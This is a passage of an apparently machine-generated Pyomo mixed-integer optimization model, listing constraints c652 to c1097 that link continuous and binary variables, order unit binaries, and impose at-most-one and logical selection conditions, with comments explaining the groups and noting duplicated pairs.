m.c652 = Constraint(expr= m.x12 + 4*m.b556 == 0)
m.c653 = Constraint(expr= m.x13 + 3*m.b557 == 0)
m.c654 = Constraint(expr= m.x14 + 10*m.b558 == 0)
m.c655 = Constraint(expr= m.x15 + 9*m.b559 == 0)
m.c656 = Constraint(expr= m.x16 + 5*m.b560 == 0)
m.c657 = Constraint(expr= m.x17 + 6*m.b561 == 0)
m.c658 = Constraint(expr= m.x18 + 6*m.b562 == 0)
m.c659 = Constraint(expr= m.x19 + 10*m.b563 == 0)
m.c660 = Constraint(expr= m.x20 + 6*m.b564 == 0)
m.c661 = Constraint(expr= m.x21 + 9*m.b565 == 0)
m.c662 = Constraint(expr= m.x22 + 7*m.b566 == 0)
m.c663 = Constraint(expr= m.x23 + 7*m.b567 == 0)
m.c664 = Constraint(expr= m.x24 + 4*m.b568 == 0)
m.c665 = Constraint(expr= m.x25 + 2*m.b569 == 0)
m.c666 = Constraint(expr= m.x26 + 4*m.b570 == 0)
m.c667 = Constraint(expr= m.x27 + 3*m.b571 == 0)
m.c668 = Constraint(expr= m.x28 + 2*m.b572 == 0)
m.c669 = Constraint(expr= m.x29 + 8*m.b573 == 0)
m.c670 = Constraint(expr= m.x30 + 5*m.b574 == 0)
m.c671 = Constraint(expr= m.x31 + 6*m.b575 == 0)
m.c672 = Constraint(expr= m.x32 + 7*m.b576 == 0)
m.c673 = Constraint(expr= m.x33 + 4*m.b577 == 0)
m.c674 = Constraint(expr= m.x34 + 2*m.b578 == 0)
m.c675 = Constraint(expr= m.x35 + 5*m.b579 == 0)
m.c676 = Constraint(expr= m.x36 + 2*m.b580 == 0)
m.c677 = Constraint(expr= m.x37 + 6*m.b581 == 0)
m.c678 = Constraint(expr= m.x38 + 4*m.b582 == 0)
m.c679 = Constraint(expr= m.x39 + 7*m.b583 == 0)
m.c680 = Constraint(expr= m.x40 + 4*m.b584 == 0)
m.c681 = Constraint(expr= m.x41 + 7*m.b585 == 0)
m.c682 = Constraint(expr= m.x42 + 3*m.b586 == 0)
m.c683 = Constraint(expr= m.x43 + 9*m.b587 == 0)
m.c684 = Constraint(expr= m.x44 + 3*m.b588 == 0)
m.c685 = Constraint(expr= m.x45 + 6*m.b589 == 0)
m.c686 = Constraint(expr= m.x46 + 7*m.b590 == 0)
m.c687 = Constraint(expr= m.x47 + 2*m.b591 == 0)
m.c688 = Constraint(expr= m.x48 + 9*m.b592 == 0)
m.c689 = Constraint(expr= m.x49 + 6*m.b593 == 0)
m.c690 = Constraint(expr= m.x50 + 3*m.b594 == 0)
m.c691 = Constraint(expr= m.x51 + m.b595 == 0)
m.c692 = Constraint(expr= m.x52 + 9*m.b596 == 0)
m.c693 = Constraint(expr= m.x53 + 10*m.b597 == 0)
m.c694 = Constraint(expr= m.x54 + 2*m.b598 == 0)
m.c695 = Constraint(expr= m.x55 + 6*m.b599 == 0)
m.c696 = Constraint(expr= m.x56 + 3*m.b600 == 0)
m.c697 = Constraint(expr= m.x57 + 7*m.b601 == 0)
m.c698 = Constraint(expr= m.x58 + 4*m.b602 == 0)
m.c699 = Constraint(expr= m.x59 + 8*m.b603 == 0)
m.c700 = Constraint(expr= m.x60 + m.b604 == 0)
m.c701 = Constraint(expr= m.x61 + 4*m.b605 == 0)
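# c702-c791 order each group of four unit binaries, e.g. b486 <= b487 <= b488 <= b489
# (with some transitively redundant pairs); this looks like a symmetry-breaking
# device across identical unit copies or periods.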
m.c702 = Constraint(expr= m.b486 - m.b487 <= 0)
m.c703 = Constraint(expr= m.b486 - m.b488 <= 0)
m.c704 = Constraint(expr= m.b486 - m.b489 <= 0)
m.c705 = Constraint(expr= m.b487 - m.b488 <= 0)
m.c706 = Constraint(expr= m.b487 - m.b489 <= 0)
m.c707 = Constraint(expr= m.b488 - m.b489 <= 0)
m.c708 = Constraint(expr= m.b490 - m.b491 <= 0)
m.c709 = Constraint(expr= m.b490 - m.b492 <= 0)
m.c710 = Constraint(expr= m.b490 - m.b493 <= 0)
m.c711 = Constraint(expr= m.b491 - m.b492 <= 0)
m.c712 = Constraint(expr= m.b491 - m.b493 <= 0)
m.c713 = Constraint(expr= m.b492 - m.b493 <= 0)
m.c714 = Constraint(expr= m.b494 - m.b495 <= 0)
m.c715 = Constraint(expr= m.b494 - m.b496 <= 0)
m.c716 = Constraint(expr= m.b494 - m.b497 <= 0)
m.c717 = Constraint(expr= m.b495 - m.b496 <= 0)
m.c718 = Constraint(expr= m.b495 - m.b497 <= 0)
m.c719 = Constraint(expr= m.b496 - m.b497 <= 0)
m.c720 = Constraint(expr= m.b498 - m.b499 <= 0)
m.c721 = Constraint(expr= m.b498 - m.b500 <= 0)
m.c722 = Constraint(expr= m.b498 - m.b501 <= 0)
m.c723 = Constraint(expr= m.b499 - m.b500 <= 0)
m.c724 = Constraint(expr= m.b499 - m.b501 <= 0)
m.c725 = Constraint(expr= m.b500 - m.b501 <= 0)
m.c726 = Constraint(expr= m.b502 - m.b503 <= 0)
m.c727 = Constraint(expr= m.b502 - m.b504 <= 0)
m.c728 = Constraint(expr= m.b502 - m.b505 <= 0)
m.c729 = Constraint(expr= m.b503 - m.b504 <= 0)
m.c730 = Constraint(expr= m.b503 - m.b505 <= 0)
m.c731 = Constraint(expr= m.b504 - m.b505 <= 0)
m.c732 = Constraint(expr= m.b506 - m.b507 <= 0)
m.c733 = Constraint(expr= m.b506 - m.b508 <= 0)
m.c734 = Constraint(expr= m.b506 - m.b509 <= 0)
m.c735 = Constraint(expr= m.b507 - m.b508 <= 0)
m.c736 = Constraint(expr= m.b507 - m.b509 <= 0)
m.c737 = Constraint(expr= m.b508 - m.b509 <= 0)
m.c738 = Constraint(expr= m.b510 - m.b511 <= 0)
m.c739 = Constraint(expr= m.b510 - m.b512 <= 0)
m.c740 = Constraint(expr= m.b510 - m.b513 <= 0)
m.c741 = Constraint(expr= m.b511 - m.b512 <= 0)
m.c742 = Constraint(expr= m.b511 - m.b513 <= 0)
m.c743 = Constraint(expr= m.b512 - m.b513 <= 0)
m.c744 = Constraint(expr= m.b514 - m.b515 <= 0)
m.c745 = Constraint(expr= m.b514 - m.b516 <= 0)
m.c746 = Constraint(expr= m.b514 - m.b517 <= 0)
m.c747 = Constraint(expr= m.b515 - m.b516 <= 0)
m.c748 = Constraint(expr= m.b515 - m.b517 <= 0)
m.c749 = Constraint(expr= m.b516 - m.b517 <= 0)
m.c750 = Constraint(expr= m.b518 - m.b519 <= 0)
m.c751 = Constraint(expr= m.b518 - m.b520 <= 0)
m.c752 = Constraint(expr= m.b518 - m.b521 <= 0)
m.c753 = Constraint(expr= m.b519 - m.b520 <= 0)
m.c754 = Constraint(expr= m.b519 - m.b521 <= 0)
m.c755 = Constraint(expr= m.b520 - m.b521 <= 0)
m.c756 = Constraint(expr= m.b522 - m.b523 <= 0)
m.c757 = Constraint(expr= m.b522 - m.b524 <= 0)
m.c758 = Constraint(expr= m.b522 - m.b525 <= 0)
m.c759 = Constraint(expr= m.b523 - m.b524 <= 0)
m.c760 = Constraint(expr= m.b523 - m.b525 <= 0)
m.c761 = Constraint(expr= m.b524 - m.b525 <= 0)
m.c762 = Constraint(expr= m.b526 - m.b527 <= 0)
m.c763 = Constraint(expr= m.b526 - m.b528 <= 0)
m.c764 = Constraint(expr= m.b526 - m.b529 <= 0)
m.c765 = Constraint(expr= m.b527 - m.b528 <= 0)
m.c766 = Constraint(expr= m.b527 - m.b529 <= 0)
m.c767 = Constraint(expr= m.b528 - m.b529 <= 0)
m.c768 = Constraint(expr= m.b530 - m.b531 <= 0)
m.c769 = Constraint(expr= m.b530 - m.b532 <= 0)
m.c770 = Constraint(expr= m.b530 - m.b533 <= 0)
m.c771 = Constraint(expr= m.b531 - m.b532 <= 0)
m.c772 = Constraint(expr= m.b531 - m.b533 <= 0)
m.c773 = Constraint(expr= m.b532 - m.b533 <= 0)
m.c774 = Constraint(expr= m.b534 - m.b535 <= 0)
m.c775 = Constraint(expr= m.b534 - m.b536 <= 0)
m.c776 = Constraint(expr= m.b534 - m.b537 <= 0)
m.c777 = Constraint(expr= m.b535 - m.b536 <= 0)
m.c778 = Constraint(expr= m.b535 - m.b537 <= 0)
m.c779 = Constraint(expr= m.b536 - m.b537 <= 0)
m.c780 = Constraint(expr= m.b538 - m.b539 <= 0)
m.c781 = Constraint(expr= m.b538 - m.b540 <= 0)
m.c782 = Constraint(expr= m.b538 - m.b541 <= 0)
m.c783 = Constraint(expr= m.b539 - m.b540 <= 0)
m.c784 = Constraint(expr= m.b539 - m.b541 <= 0)
m.c785 = Constraint(expr= m.b540 - m.b541 <= 0)
m.c786 = Constraint(expr= m.b542 - m.b543 <= 0)
m.c787 = Constraint(expr= m.b542 - m.b544 <= 0)
m.c788 = Constraint(expr= m.b542 - m.b545 <= 0)
m.c789 = Constraint(expr= m.b543 - m.b544 <= 0)
m.c790 = Constraint(expr= m.b543 - m.b545 <= 0)
m.c791 = Constraint(expr= m.b544 - m.b545 <= 0)
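# From c792 onward the model imposes pairwise at-most-one conditions on the
# fixed-charge binaries (b_i + b_j <= 1 within each group of four). Several pairs
# are emitted twice (e.g. c792 and c795 are identical), apparently an artifact of
# the automatic conversion; the duplicates are redundant but harmless.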
m.c792 = Constraint(expr= m.b546 + m.b547 <= 1)
m.c793 = Constraint(expr= m.b546 + m.b548 <= 1)
m.c794 = Constraint(expr= m.b546 + m.b549 <= 1)
m.c795 = Constraint(expr= m.b546 + m.b547 <= 1)
m.c796 = Constraint(expr= m.b547 + m.b548 <= 1)
m.c797 = Constraint(expr= m.b547 + m.b549 <= 1)
m.c798 = Constraint(expr= m.b546 + m.b548 <= 1)
m.c799 = Constraint(expr= m.b547 + m.b548 <= 1)
m.c800 = Constraint(expr= m.b548 + m.b549 <= 1)
m.c801 = Constraint(expr= m.b546 + m.b549 <= 1)
m.c802 = Constraint(expr= m.b547 + m.b549 <= 1)
m.c803 = Constraint(expr= m.b548 + m.b549 <= 1)
m.c804 = Constraint(expr= m.b550 + m.b551 <= 1)
m.c805 = Constraint(expr= m.b550 + m.b552 <= 1)
m.c806 = Constraint(expr= m.b550 + m.b553 <= 1)
m.c807 = Constraint(expr= m.b550 + m.b551 <= 1)
m.c808 = Constraint(expr= m.b551 + m.b552 <= 1)
m.c809 = Constraint(expr= m.b551 + m.b553 <= 1)
m.c810 = Constraint(expr= m.b550 + m.b552 <= 1)
m.c811 = Constraint(expr= m.b551 + m.b552 <= 1)
m.c812 = Constraint(expr= m.b552 + m.b553 <= 1)
m.c813 = Constraint(expr= m.b550 + m.b553 <= 1)
m.c814 = Constraint(expr= m.b551 + m.b553 <= 1)
m.c815 = Constraint(expr= m.b552 + m.b553 <= 1)
m.c816 = Constraint(expr= m.b554 + m.b555 <= 1)
m.c817 = Constraint(expr= m.b554 + m.b556 <= 1)
m.c818 = Constraint(expr= m.b554 + m.b557 <= 1)
m.c819 = Constraint(expr= m.b554 + m.b555 <= 1)
m.c820 = Constraint(expr= m.b555 + m.b556 <= 1)
m.c821 = Constraint(expr= m.b555 + m.b557 <= 1)
m.c822 = Constraint(expr= m.b554 + m.b556 <= 1)
m.c823 = Constraint(expr= m.b555 + m.b556 <= 1)
m.c824 = Constraint(expr= m.b556 + m.b557 <= 1)
m.c825 = Constraint(expr= m.b554 + m.b557 <= 1)
m.c826 = Constraint(expr= m.b555 + m.b557 <= 1)
m.c827 = Constraint(expr= m.b556 + m.b557 <= 1)
m.c828 = Constraint(expr= m.b558 + m.b559 <= 1)
m.c829 = Constraint(expr= m.b558 + m.b560 <= 1)
m.c830 = Constraint(expr= m.b558 + m.b561 <= 1)
m.c831 = Constraint(expr= m.b558 + m.b559 <= 1)
m.c832 = Constraint(expr= m.b559 + m.b560 <= 1)
m.c833 = Constraint(expr= m.b559 + m.b561 <= 1)
m.c834 = Constraint(expr= m.b558 + m.b560 <= 1)
m.c835 = Constraint(expr= m.b559 + m.b560 <= 1)
m.c836 = Constraint(expr= m.b560 + m.b561 <= 1)
m.c837 = Constraint(expr= m.b558 + m.b561 <= 1)
m.c838 = Constraint(expr= m.b559 + m.b561 <= 1)
m.c839 = Constraint(expr= m.b560 + m.b561 <= 1)
m.c840 = Constraint(expr= m.b562 + m.b563 <= 1)
m.c841 = Constraint(expr= m.b562 + m.b564 <= 1)
m.c842 = Constraint(expr= m.b562 + m.b565 <= 1)
m.c843 = Constraint(expr= m.b562 + m.b563 <= 1)
m.c844 = Constraint(expr= m.b563 + m.b564 <= 1)
m.c845 = Constraint(expr= m.b563 + m.b565 <= 1)
m.c846 = Constraint(expr= m.b562 + m.b564 <= 1)
m.c847 = Constraint(expr= m.b563 + m.b564 <= 1)
m.c848 = Constraint(expr= m.b564 + m.b565 <= 1)
m.c849 = Constraint(expr= m.b562 + m.b565 <= 1)
m.c850 = Constraint(expr= m.b563 + m.b565 <= 1)
m.c851 = Constraint(expr= m.b564 + m.b565 <= 1)
m.c852 = Constraint(expr= m.b566 + m.b567 <= 1)
m.c853 = Constraint(expr= m.b566 + m.b568 <= 1)
m.c854 = Constraint(expr= m.b566 + m.b569 <= 1)
m.c855 = Constraint(expr= m.b566 + m.b567 <= 1)
m.c856 = Constraint(expr= m.b567 + m.b568 <= 1)
m.c857 = Constraint(expr= m.b567 + m.b569 <= 1)
m.c858 = Constraint(expr= m.b566 + m.b568 <= 1)
m.c859 = Constraint(expr= m.b567 + m.b568 <= 1)
m.c860 = Constraint(expr= m.b568 + m.b569 <= 1)
m.c861 = Constraint(expr= m.b566 + m.b569 <= 1)
m.c862 = Constraint(expr= m.b567 + m.b569 <= 1)
m.c863 = Constraint(expr= m.b568 + m.b569 <= 1)
m.c864 = Constraint(expr= m.b570 + m.b571 <= 1)
m.c865 = Constraint(expr= m.b570 + m.b572 <= 1)
m.c866 = Constraint(expr= m.b570 + m.b573 <= 1)
m.c867 = Constraint(expr= m.b570 + m.b571 <= 1)
m.c868 = Constraint(expr= m.b571 + m.b572 <= 1)
m.c869 = Constraint(expr= m.b571 + m.b573 <= 1)
m.c870 = Constraint(expr= m.b570 + m.b572 <= 1)
m.c871 = Constraint(expr= m.b571 + m.b572 <= 1)
m.c872 = Constraint(expr= m.b572 + m.b573 <= 1)
m.c873 = Constraint(expr= m.b570 + m.b573 <= 1)
m.c874 = Constraint(expr= m.b571 + m.b573 <= 1)
m.c875 = Constraint(expr= m.b572 + m.b573 <= 1)
m.c876 = Constraint(expr= m.b574 + m.b575 <= 1)
m.c877 = Constraint(expr= m.b574 + m.b576 <= 1)
m.c878 = Constraint(expr= m.b574 + m.b577 <= 1)
m.c879 = Constraint(expr= m.b574 + m.b575 <= 1)
m.c880 = Constraint(expr= m.b575 + m.b576 <= 1)
m.c881 = Constraint(expr= m.b575 + m.b577 <= 1)
m.c882 = Constraint(expr= m.b574 + m.b576 <= 1)
m.c883 = Constraint(expr= m.b575 + m.b576 <= 1)
m.c884 = Constraint(expr= m.b576 + m.b577 <= 1)
m.c885 = Constraint(expr= m.b574 + m.b577 <= 1)
m.c886 = Constraint(expr= m.b575 + m.b577 <= 1)
m.c887 = Constraint(expr= m.b576 + m.b577 <= 1)
m.c888 = Constraint(expr= m.b578 + m.b579 <= 1)
m.c889 = Constraint(expr= m.b578 + m.b580 <= 1)
m.c890 = Constraint(expr= m.b578 + m.b581 <= 1)
m.c891 = Constraint(expr= m.b578 + m.b579 <= 1)
m.c892 = Constraint(expr= m.b579 + m.b580 <= 1)
m.c893 = Constraint(expr= m.b579 + m.b581 <= 1)
m.c894 = Constraint(expr= m.b578 + m.b580 <= 1)
m.c895 = Constraint(expr= m.b579 + m.b580 <= 1)
m.c896 = Constraint(expr= m.b580 + m.b581 <= 1)
m.c897 = Constraint(expr= m.b578 + m.b581 <= 1)
m.c898 = Constraint(expr= m.b579 + m.b581 <= 1)
m.c899 = Constraint(expr= m.b580 + m.b581 <= 1)
m.c900 = Constraint(expr= m.b582 + m.b583 <= 1)
m.c901 = Constraint(expr= m.b582 + m.b584 <= 1)
m.c902 = Constraint(expr= m.b582 + m.b585 <= 1)
m.c903 = Constraint(expr= m.b582 + m.b583 <= 1)
m.c904 = Constraint(expr= m.b583 + m.b584 <= 1)
m.c905 = Constraint(expr= m.b583 + m.b585 <= 1)
m.c906 = Constraint(expr= m.b582 + m.b584 <= 1)
m.c907 = Constraint(expr= m.b583 + m.b584 <= 1)
m.c908 = Constraint(expr= m.b584 + m.b585 <= 1)
m.c909 = Constraint(expr= m.b582 + m.b585 <= 1)
m.c910 = Constraint(expr= m.b583 + m.b585 <= 1)
m.c911 = Constraint(expr= m.b584 + m.b585 <= 1)
m.c912 = Constraint(expr= m.b586 + m.b587 <= 1)
m.c913 = Constraint(expr= m.b586 + m.b588 <= 1)
m.c914 = Constraint(expr= m.b586 + m.b589 <= 1)
m.c915 = Constraint(expr= m.b586 + m.b587 <= 1)
m.c916 = Constraint(expr= m.b587 + m.b588 <= 1)
m.c917 = Constraint(expr= m.b587 + m.b589 <= 1)
m.c918 = Constraint(expr= m.b586 + m.b588 <= 1)
m.c919 = Constraint(expr= m.b587 + m.b588 <= 1)
m.c920 = Constraint(expr= m.b588 + m.b589 <= 1)
m.c921 = Constraint(expr= m.b586 + m.b589 <= 1)
m.c922 = Constraint(expr= m.b587 + m.b589 <= 1)
m.c923 = Constraint(expr= m.b588 + m.b589 <= 1)
m.c924 = Constraint(expr= m.b590 + m.b591 <= 1)
m.c925 = Constraint(expr= m.b590 + m.b592 <= 1)
m.c926 = Constraint(expr= m.b590 + m.b593 <= 1)
m.c927 = Constraint(expr= m.b590 + m.b591 <= 1)
m.c928 = Constraint(expr= m.b591 + m.b592 <= 1)
m.c929 = Constraint(expr= m.b591 + m.b593 <= 1)
m.c930 = Constraint(expr= m.b590 + m.b592 <= 1)
m.c931 = Constraint(expr= m.b591 + m.b592 <= 1)
m.c932 = Constraint(expr= m.b592 + m.b593 <= 1)
m.c933 = Constraint(expr= m.b590 + m.b593 <= 1)
m.c934 = Constraint(expr= m.b591 + m.b593 <= 1)
m.c935 = Constraint(expr= m.b592 + m.b593 <= 1)
m.c936 = Constraint(expr= m.b594 + m.b595 <= 1)
m.c937 = Constraint(expr= m.b594 + m.b596 <= 1)
m.c938 = Constraint(expr= m.b594 + m.b597 <= 1)
m.c939 = Constraint(expr= m.b594 + m.b595 <= 1)
m.c940 = Constraint(expr= m.b595 + m.b596 <= 1)
m.c941 = Constraint(expr= m.b595 + m.b597 <= 1)
m.c942 = Constraint(expr= m.b594 + m.b596 <= 1)
m.c943 = Constraint(expr= m.b595 + m.b596 <= 1)
m.c944 = Constraint(expr= m.b596 + m.b597 <= 1)
m.c945 = Constraint(expr= m.b594 + m.b597 <= 1)
m.c946 = Constraint(expr= m.b595 + m.b597 <= 1)
m.c947 = Constraint(expr= m.b596 + m.b597 <= 1)
m.c948 = Constraint(expr= m.b598 + m.b599 <= 1)
m.c949 = Constraint(expr= m.b598 + m.b600 <= 1)
m.c950 = Constraint(expr= m.b598 + m.b601 <= 1)
m.c951 = Constraint(expr= m.b598 + m.b599 <= 1)
m.c952 = Constraint(expr= m.b599 + m.b600 <= 1)
m.c953 = Constraint(expr= m.b599 + m.b601 <= 1)
m.c954 = Constraint(expr= m.b598 + m.b600 <= 1)
m.c955 = Constraint(expr= m.b599 + m.b600 <= 1)
m.c956 = Constraint(expr= m.b600 + m.b601 <= 1)
m.c957 = Constraint(expr= m.b598 + m.b601 <= 1)
m.c958 = Constraint(expr= m.b599 + m.b601 <= 1)
m.c959 = Constraint(expr= m.b600 + m.b601 <= 1)
m.c960 = Constraint(expr= m.b602 + m.b603 <= 1)
m.c961 = Constraint(expr= m.b602 + m.b604 <= 1)
m.c962 = Constraint(expr= m.b602 + m.b605 <= 1)
m.c963 = Constraint(expr= m.b602 + m.b603 <= 1)
m.c964 = Constraint(expr= m.b603 + m.b604 <= 1)
m.c965 = Constraint(expr= m.b603 + m.b605 <= 1)
m.c966 = Constraint(expr= m.b602 + m.b604 <= 1)
m.c967 = Constraint(expr= m.b603 + m.b604 <= 1)
m.c968 = Constraint(expr= m.b604 + m.b605 <= 1)
m.c969 = Constraint(expr= m.b602 + m.b605 <= 1)
m.c970 = Constraint(expr= m.b603 + m.b605 <= 1)
m.c971 = Constraint(expr= m.b604 + m.b605 <= 1)
m.c972 = Constraint(expr= m.b486 - m.b546 <= 0)
m.c973 = Constraint(expr= - m.b486 + m.b487 - m.b547 <= 0)
m.c974 = Constraint(expr= - m.b486 - m.b487 + m.b488 - m.b548 <= 0)
m.c975 = Constraint(expr= - m.b486 - m.b487 - m.b488 + m.b489 - m.b549 <= 0)
m.c976 = Constraint(expr= m.b490 - m.b550 <= 0)
m.c977 = Constraint(expr= - m.b490 + m.b491 - m.b551 <= 0)
m.c978 = Constraint(expr= - m.b490 - m.b491 + m.b492 - m.b552 <= 0)
m.c979 = Constraint(expr= - m.b490 - m.b491 - m.b492 + m.b493 - m.b553 <= 0)
m.c980 = Constraint(expr= m.b494 - m.b554 <= 0)
m.c981 = Constraint(expr= - m.b494 + m.b495 - m.b555 <= 0)
m.c982 = Constraint(expr= - m.b494 - m.b495 + m.b496 - m.b556 <= 0)
m.c983 = Constraint(expr= - m.b494 - m.b495 - m.b496 + m.b497 - m.b557 <= 0)
m.c984 = Constraint(expr= m.b498 - m.b558 <= 0)
m.c985 = Constraint(expr= - m.b498 + m.b499 - m.b559 <= 0)
m.c986 = Constraint(expr= - m.b498 - m.b499 + m.b500 - m.b560 <= 0)
m.c987 = Constraint(expr= - m.b498 - m.b499 - m.b500 + m.b501 - m.b561 <= 0)
m.c988 = Constraint(expr= m.b502 - m.b562 <= 0)
m.c989 = Constraint(expr= - m.b502 + m.b503 - m.b563 <= 0)
m.c990 = Constraint(expr= - m.b502 - m.b503 + m.b504 - m.b564 <= 0)
m.c991 = Constraint(expr= - m.b502 - m.b503 - m.b504 + m.b505 - m.b565 <= 0)
m.c992 = Constraint(expr= m.b506 - m.b566 <= 0)
m.c993 = Constraint(expr= - m.b506 + m.b507 - m.b567 <= 0)
m.c994 = Constraint(expr= - m.b506 - m.b507 + m.b508 - m.b568 <= 0)
m.c995 = Constraint(expr= - m.b506 - m.b507 - m.b508 + m.b509 - m.b569 <= 0)
m.c996 = Constraint(expr= m.b510 - m.b570 <= 0)
m.c997 = Constraint(expr= - m.b510 + m.b511 - m.b571 <= 0)
m.c998 = Constraint(expr= - m.b510 - m.b511 + m.b512 - m.b572 <= 0)
m.c999 = Constraint(expr= - m.b510 - m.b511 - m.b512 + m.b513 - m.b573 <= 0)
m.c1000 = Constraint(expr= m.b514 - m.b574 <= 0)
m.c1001 = Constraint(expr= - m.b514 + m.b515 - m.b575 <= 0)
m.c1002 = Constraint(expr= - m.b514 - m.b515 + m.b516 - m.b576 <= 0)
m.c1003 = Constraint(expr= - m.b514 - m.b515 - m.b516 + m.b517 - m.b577 <= 0)
m.c1004 = Constraint(expr= m.b518 - m.b578 <= 0)
m.c1005 = Constraint(expr= - m.b518 + m.b519 - m.b579 <= 0)
m.c1006 = Constraint(expr= - m.b518 - m.b519 + m.b520 - m.b580 <= 0)
m.c1007 = Constraint(expr= - m.b518 - m.b519 - m.b520 + m.b521 - m.b581 <= 0)
m.c1008 = Constraint(expr= m.b522 - m.b582 <= 0)
m.c1009 = Constraint(expr= - m.b522 + m.b523 - m.b583 <= 0)
m.c1010 = Constraint(expr= - m.b522 - m.b523 + m.b524 - m.b584 <= 0)
m.c1011 = Constraint(expr= - m.b522 - m.b523 - m.b524 + m.b525 - m.b585 <= 0)
m.c1012 = Constraint(expr= m.b526 - m.b586 <= 0)
m.c1013 = Constraint(expr= - m.b526 + m.b527 - m.b587 <= 0)
m.c1014 = Constraint(expr= - m.b526 - m.b527 + m.b528 - m.b588 <= 0)
m.c1015 = Constraint(expr= - m.b526 - m.b527 - m.b528 + m.b529 - m.b589 <= 0)
m.c1016 = Constraint(expr= m.b530 - m.b590 <= 0)
m.c1017 = Constraint(expr= - m.b530 + m.b531 - m.b591 <= 0)
m.c1018 = Constraint(expr= - m.b530 - m.b531 + m.b532 - m.b592 <= 0)
m.c1019 = Constraint(expr= - m.b530 - m.b531 - m.b532 + m.b533 - m.b593 <= 0)
m.c1020 = Constraint(expr= m.b534 - m.b594 <= 0)
m.c1021 = Constraint(expr= - m.b534 + m.b535 - m.b595 <= 0)
m.c1022 = Constraint(expr= - m.b534 - m.b535 + m.b536 - m.b596 <= 0)
m.c1023 = Constraint(expr= - m.b534 - m.b535 - m.b536 + m.b537 - m.b597 <= 0)
m.c1024 = Constraint(expr= m.b538 - m.b598 <= 0)
m.c1025 = Constraint(expr= - m.b538 + m.b539 - m.b599 <= 0)
m.c1026 = Constraint(expr= - m.b538 - m.b539 + m.b540 - m.b600 <= 0)
m.c1027 = Constraint(expr= - m.b538 - m.b539 - m.b540 + m.b541 - m.b601 <= 0)
m.c1028 = Constraint(expr= m.b542 - m.b602 <= 0)
m.c1029 = Constraint(expr= - m.b542 + m.b543 - m.b603 <= 0)
m.c1030 = Constraint(expr= - m.b542 - m.b543 + m.b544 - m.b604 <= 0)
m.c1031 = Constraint(expr= - m.b542 - m.b543 - m.b544 + m.b545 - m.b605 <= 0)
m.c1032 = Constraint(expr= m.b486 + m.b490 == 1)
m.c1033 = Constraint(expr= m.b487 + m.b491 == 1)
m.c1034 = Constraint(expr= m.b488 + m.b492 == 1)
m.c1035 = Constraint(expr= m.b489 + m.b493 == 1)
m.c1036 = Constraint(expr= - m.b494 + m.b506 + m.b510 >= 0)
m.c1037 = Constraint(expr= - m.b495 + m.b507 + m.b511 >= 0)
m.c1038 = Constraint(expr= - m.b496 + m.b508 + m.b512 >= 0)
m.c1039 = Constraint(expr= - m.b497 + m.b509 + m.b513 >= 0)
m.c1040 = Constraint(expr= - m.b506 + m.b530 >= 0)
m.c1041 = Constraint(expr= - m.b507 + m.b531 >= 0)
m.c1042 = Constraint(expr= - m.b508 + m.b532 >= 0)
m.c1043 = Constraint(expr= - m.b509 + m.b533 >= 0)
m.c1044 = Constraint(expr= - m.b510 + m.b534 >= 0)
m.c1045 = Constraint(expr= - m.b511 + m.b535 >= 0)
m.c1046 = Constraint(expr= - m.b512 + m.b536 >= 0)
m.c1047 = Constraint(expr= - m.b513 + m.b537 >= 0)
m.c1048 = Constraint(expr= - m.b498 + m.b514 >= 0)
m.c1049 = Constraint(expr= - m.b499 + m.b515 >= 0)
m.c1050 = Constraint(expr= - m.b500 + m.b516 >= 0)
m.c1051 = Constraint(expr= - m.b501 + m.b517 >= 0)
m.c1052 = Constraint(expr= - m.b514 + m.b538 + m.b542 >= 0)
m.c1053 = Constraint(expr= - m.b515 + m.b539 + m.b543 >= 0)
m.c1054 = Constraint(expr= - m.b516 + m.b540 + m.b544 >= 0)
m.c1055 = Constraint(expr= - m.b517 + m.b541 + m.b545 >= 0)
m.c1056 = Constraint(expr= - m.b502 + m.b518 + m.b522 + m.b526 >= 0)
m.c1057 = Constraint(expr= - m.b503 + m.b519 + m.b523 + m.b527 >= 0)
m.c1058 = Constraint(expr= - m.b504 + m.b520 + m.b524 + m.b528 >= 0)
m.c1059 = Constraint(expr= - m.b505 + m.b521 + m.b525 + m.b529 >= 0)
m.c1060 = Constraint(expr= - m.b518 + m.b542 >= 0)
m.c1061 = Constraint(expr= - m.b519 + m.b543 >= 0)
m.c1062 = Constraint(expr= - m.b520 + m.b544 >= 0)
m.c1063 = Constraint(expr= - m.b521 + m.b545 >= 0)
m.c1064 = Constraint(expr= m.b486 + m.b490 - m.b494 >= 0)
m.c1065 = Constraint(expr= m.b487 + m.b491 - m.b495 >= 0)
m.c1066 = Constraint(expr= m.b488 + m.b492 - m.b496 >= 0)
m.c1067 = Constraint(expr= m.b489 + m.b493 - m.b497 >= 0)
m.c1068 = Constraint(expr= m.b486 + m.b490 - m.b498 >= 0)
m.c1069 = Constraint(expr= m.b487 + m.b491 - m.b499 >= 0)
m.c1070 = Constraint(expr= m.b488 + m.b492 - m.b500 >= 0)
m.c1071 = Constraint(expr= m.b489 + m.b493 - m.b501 >= 0)
m.c1072 = Constraint(expr= m.b486 + m.b490 - m.b502 >= 0)
m.c1073 = Constraint(expr= m.b487 + m.b491 - m.b503 >= 0)
m.c1074 = Constraint(expr= m.b488 + m.b492 - m.b504 >= 0)
m.c1075 = Constraint(expr= m.b489 + m.b493 - m.b505 >= 0)
m.c1076 = Constraint(expr= m.b494 - m.b506 >= 0)
m.c1077 = Constraint(expr= m.b495 - m.b507 >= 0)
m.c1078 = Constraint(expr= m.b496 - m.b508 >= 0)
m.c1079 = Constraint(expr= m.b497 - m.b509 >= 0)
m.c1080 = Constraint(expr= m.b494 - m.b510 >= 0)
m.c1081 = Constraint(expr= m.b495 - m.b511 >= 0)
m.c1082 = Constraint(expr= m.b496 - m.b512 >= 0)
m.c1083 = Constraint(expr= m.b497 - m.b513 >= 0)
m.c1084 = Constraint(expr= m.b498 - m.b514 >= 0)
m.c1085 = Constraint(expr= m.b499 - m.b515 >= 0)
m.c1086 = Constraint(expr= m.b500 - m.b516 >= 0)
m.c1087 = Constraint(expr= m.b501 - m.b517 >= 0)
m.c1088 = Constraint(expr= m.b502 - m.b518 >= 0)
m.c1089 = Constraint(expr= m.b503 - m.b519 >= 0)
m.c1090 = Constraint(expr= m.b504 - m.b520 >= 0)
m.c1091 = Constraint(expr= m.b505 - m.b521 >= 0)
m.c1092 = Constraint(expr= m.b502 - m.b522 >= 0)
m.c1093 = Constraint(expr= m.b503 - m.b523 >= 0)
m.c1094 = Constraint(expr= m.b504 - m.b524 >= 0)
m.c1095 = Constraint(expr= m.b505 - m.b525 >= 0)
m.c1096 = Constraint(expr= m.b502 - m.b526 >= 0)
m.c1097 = Constraint(expr= m.b503 - m.b527 >= 0)
